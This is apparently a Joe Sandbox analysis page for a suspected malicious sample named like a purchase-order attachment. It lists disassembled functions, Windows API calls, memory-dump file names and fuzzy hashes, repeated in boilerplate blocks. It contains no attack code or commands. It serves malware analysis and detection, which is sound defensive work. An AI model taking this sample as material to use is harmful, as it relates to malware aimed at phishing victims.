Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: [ KeepUnwinding ]
API String ID: 2546344036-400895726
Opcode ID: a194a7c0d0f8bf0d13eda8b02fc6739eea9f927413269e725c7a1e9c4323ee48
Instruction ID: 520bf4f3fc76c98f289351df73e38c82c77d56f4a0dc94b1014c72b84c01f59d
Opcode Fuzzy Hash: a194a7c0d0f8bf0d13eda8b02fc6739eea9f927413269e725c7a1e9c4323ee48
Instruction Fuzzy Hash: 54B15C32A0DB4181EB58EF28D4806E9B3A9FF56B48F984135DF4D4A398EF39D455C320

Function 00007FF7BD6231E0 Relevance: 4.8, APIs: 3, Instructions: 256threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF7BD62329C
SwitchToThread.KERNEL32 ref: 00007FF7BD6232A5

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: de3af9872942d2e5463f82b08a78e24417d9ee751223df948923f138561bc3d3
Instruction ID: 5b64b1bae136f396ed2c05ed3a7fe4685d1638263a4037723750fe1cec280d2e
Opcode Fuzzy Hash: de3af9872942d2e5463f82b08a78e24417d9ee751223df948923f138561bc3d3
Instruction Fuzzy Hash: 64B18271E0DA8286EA18AB1C94402B8F3A1FF66BD8F844539DB5D47399FF7CE4508361

Function 00007FF7BD60D620 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 195COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7BD60D816
LeaveCriticalSection.KERNEL32 ref: 00007FF7BD60D830

Strings

@, xrefs: 00007FF7BD60D83A

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: @
API String ID: 3168844106-2766056989
Opcode ID: 7d920ba94a78babfd5c8dd77d5399f464b04109bbd08e66ae5698b190d646eb8
Instruction ID: 10c10b1d4bc67d9430dd379d31d5c9292f3bc101ea82f5381b6b1d1db27c1e07
Opcode Fuzzy Hash: 7d920ba94a78babfd5c8dd77d5399f464b04109bbd08e66ae5698b190d646eb8
Instruction Fuzzy Hash: B3913161E1C64281FB58AB1DD880775A392AF767D9F980135EB0C877ADFE6CF4508B20

Function 00007FF7BD62E8E0 Relevance: 3.3, APIs: 2, Instructions: 344threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF7BD62EA55
SwitchToThread.KERNEL32 ref: 00007FF7BD62EA85

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: c2dd94c7d96df3f2775cdd799debc1e0e9d9a61e5e2074260edde2e60430f6ac
Instruction ID: 3d1633bb9c713eebb9c005f5b0dc1d93a9f4fdb49fcbc33ba6b7e0b83907e097
Opcode Fuzzy Hash: c2dd94c7d96df3f2775cdd799debc1e0e9d9a61e5e2074260edde2e60430f6ac
Instruction Fuzzy Hash: 78E18272E0DA8182EB64AB19D4403A9B361FB65BD8F844132DB9D47B99FF7CE440C721

Function 00007FF7BD602080 Relevance: 3.2, APIs: 2, Instructions: 175COMMON

Download Yara Rule

APIs

GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF7BD5F828B,?,?,?,?,?,?,00007FF7BD5F2000), ref: 00007FF7BD60211F
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF7BD5F828B,?,?,?,?,?,?,00007FF7BD5F2000), ref: 00007FF7BD60217C

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: EnabledFeaturesState
String ID:
API String ID: 1557480591-0
Opcode ID: 72210cc46d501d66917d4aa4741235ebaad592b546a2f8b3c708735d4c7245cd
Instruction ID: 585aaad6a1f62dea88e3dfb73e7dc6ed7bda0b91913e25f06cf226bf50c97c69
Opcode Fuzzy Hash: 72210cc46d501d66917d4aa4741235ebaad592b546a2f8b3c708735d4c7245cd
Instruction Fuzzy Hash: ED51B132F0C22206FF6D949D949937582875FBA3D8FC58578DB4E536C9ED7EA8024224

Function 00007FF7BD61C7D0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7BD61C896
LeaveCriticalSection.KERNEL32 ref: 00007FF7BD61C8B0

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: e34b206bca067b1027f213739d0e5433538d12ce5d402785f71c1d98d157b15a
Instruction ID: 15dbfd2f9a8d0ca50cce6993c2f51f08a7e48c6004a505ae05a56933860f02c0
Opcode Fuzzy Hash: e34b206bca067b1027f213739d0e5433538d12ce5d402785f71c1d98d157b15a
Instruction Fuzzy Hash: 96417026E1C65541E718AB2ED540279E7A2FF6ABD8B885035DF4C03B5DFF6CE0218350

Function 00007FF7BD624B10 Relevance: 1.8, Strings: 1, Instructions: 564COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7BD62505B

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d80cb2096afa2d96802b29f732793f8d2c2ea0a515708a2f5b61d075e09ca355
Instruction ID: 538781ee22a5bd10c4198cac7f3719042536379a0cf85b0c642b8ba7bd1aac81
Opcode Fuzzy Hash: d80cb2096afa2d96802b29f732793f8d2c2ea0a515708a2f5b61d075e09ca355
Instruction Fuzzy Hash: 61429232E0DA4681D619AB1DE440278B7A1FB627E9F844631DB6D47798FF7CE460C321

Function 00007FF7BD6102A0 Relevance: 1.7, Strings: 1, Instructions: 441COMMON

Download Yara Rule

Strings

?, xrefs: 00007FF7BD6102EB

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: d973c782404e594d9bcbf2e5c6d56061f7dad822c0a4488c5f43b24ac340032d
Instruction ID: c38c28317471ca487110aabde7adbd05aab9bd6e2052fa3ec887939c16621dd7
Opcode Fuzzy Hash: d973c782404e594d9bcbf2e5c6d56061f7dad822c0a4488c5f43b24ac340032d
Instruction Fuzzy Hash: 4412CC32E0CA4682EF18AB19E4417A9A366FB66BD8F845231DB5D43798EF3CE051C750

Function 00007FF7BD5FBF90 Relevance: 1.6, Strings: 1, Instructions: 362COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF7BD5FC2B3

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
Instruction ID: bca895237a376271cbe78229099b90f8e06e0bfc793a25d8b933ce08f07ca02f
Opcode Fuzzy Hash: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
Instruction Fuzzy Hash: 93D1C0B7B1874983E71CAF2994452A972A2EB56BD8F541235CE5D0BBDCEF38D410CB40

Function 00007FF7BD5FEB00 Relevance: 1.6, APIs: 1, Instructions: 55timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7BD5F826E,?,?,?,?,?,?,00007FF7BD5F2000), ref: 00007FF7BD5FEBCC

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 01526b02e241dee81f399a2eac65e121072c1da9abb2975d62793974b100dfe8
Instruction ID: 63d34f642699a92ef0ec382e8b22116caf4c1f96924f7582dd3f81433dd5f9a5
Opcode Fuzzy Hash: 01526b02e241dee81f399a2eac65e121072c1da9abb2975d62793974b100dfe8
Instruction Fuzzy Hash: DB214F31D0DB8286E74CAB5DB840265B2B0FB66355F804135E74D43759FFBCE4A48761

Function 00007FF7BD6258C0 Relevance: 1.0, Instructions: 950COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c46563421866cb1b5f469f90219f00d70860dff413f8aa2cbdd885a1ae4a15a1
Instruction ID: d40e2f4d7a22f8c6526a7ceda352e5e6d28f72858146b7be377db118e73cd290
Opcode Fuzzy Hash: c46563421866cb1b5f469f90219f00d70860dff413f8aa2cbdd885a1ae4a15a1
Instruction Fuzzy Hash: 6792E361E0CA4681EA19EB5DD4506B4E392BF7ABD8FC44136EA0E53768FE7CF0518320

Function 00007FF7BD6267E0 Relevance: .7, Instructions: 655COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801744bdd96377547b888a3c70e772e67b1585d8fb76d1f3f959e3ca14fd2e86
Instruction ID: b4a9d8bf53e974a863519b9cfea42edf9f6dfb9846e28f6815ddcf73cf0f2e81
Opcode Fuzzy Hash: 801744bdd96377547b888a3c70e772e67b1585d8fb76d1f3f959e3ca14fd2e86
Instruction Fuzzy Hash: 9652CE32F0CB4586EB189FA9E4401ADB7A2FB66BD8B444535EF4E17B58EE3CE4508710

Function 00007FF7BD6271B0 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 781d2a1a5c9ba1d80fa3332f439c67dbd3f5da6a5da9899e467eda87960517b7
Instruction ID: eea8e7e150908ead7a3a45ee0a5e7588ceed55d72dca7560d528e882068680a7
Opcode Fuzzy Hash: 781d2a1a5c9ba1d80fa3332f439c67dbd3f5da6a5da9899e467eda87960517b7
Instruction Fuzzy Hash: 2432A222F0D74686EB18DB69D400ABCA3A2AB267DCB804535DF0D17B8CFE78E451C761

Function 00007FF7BD616C90 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12364d0ff0cea06089e9274694b767b8b30ef639dd9b265c612d6c852c853e6b
Instruction ID: 5a6396e8111d58c9f7a38e1a08839186d12b9f1be35694a74388ffb34d13f9e7
Opcode Fuzzy Hash: 12364d0ff0cea06089e9274694b767b8b30ef639dd9b265c612d6c852c853e6b
Instruction Fuzzy Hash: CF1223E6A1D79681EE599B1DC044368A7A2FF26BE8F946235CF1C073D8EF6CD494C210

Function 00007FF7BD6A7F40 Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 313dea30c798e73606019446f4cb135ba51061c0bfdcea6891a82da26de4cdd6
Instruction ID: 6db608e619ae5852a21127b62cc7ef30b6930633d60583c4e21bb9269781f503
Opcode Fuzzy Hash: 313dea30c798e73606019446f4cb135ba51061c0bfdcea6891a82da26de4cdd6
Instruction Fuzzy Hash: 4AF12662F1C55242F76C6A1C98017B9A353EFB2388F989234DF9E06ADCFE3DA5458710

Function 00007FF7BD611D60 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00ca48302f7e549fd0b9dcb0b29a96f96b9d26f61ae64e1577846578a65f7f54
Instruction ID: c2b60c6c34a6ef73e07b8cdc315371dc73210517da759fc75cd75b95506d7768
Opcode Fuzzy Hash: 00ca48302f7e549fd0b9dcb0b29a96f96b9d26f61ae64e1577846578a65f7f54
Instruction Fuzzy Hash: 6702A172E0CA8686EA08DB1DD441778A791AB66BF8F845335DB2D473D8EE7CE451C320

Function 00007FF7BD6117B4 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: CounterPerformanceQuery
String ID:
API String ID: 2783962273-0
Opcode ID: dbabca0daaad52e6d2fee9b053951e65599bec3c22e1c459a219101abfb20a77
Instruction ID: 3fa40912b241cf42bc50d207178747e337c5d9abea8fc143a053453dbe972155
Opcode Fuzzy Hash: dbabca0daaad52e6d2fee9b053951e65599bec3c22e1c459a219101abfb20a77
Instruction Fuzzy Hash: 2E02D461E0EB4645EA1AEB2CD450374A7A1EF667A8F945231DB4D133A8FF7CE491C320

Function 00007FF7BD5FB6F0 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

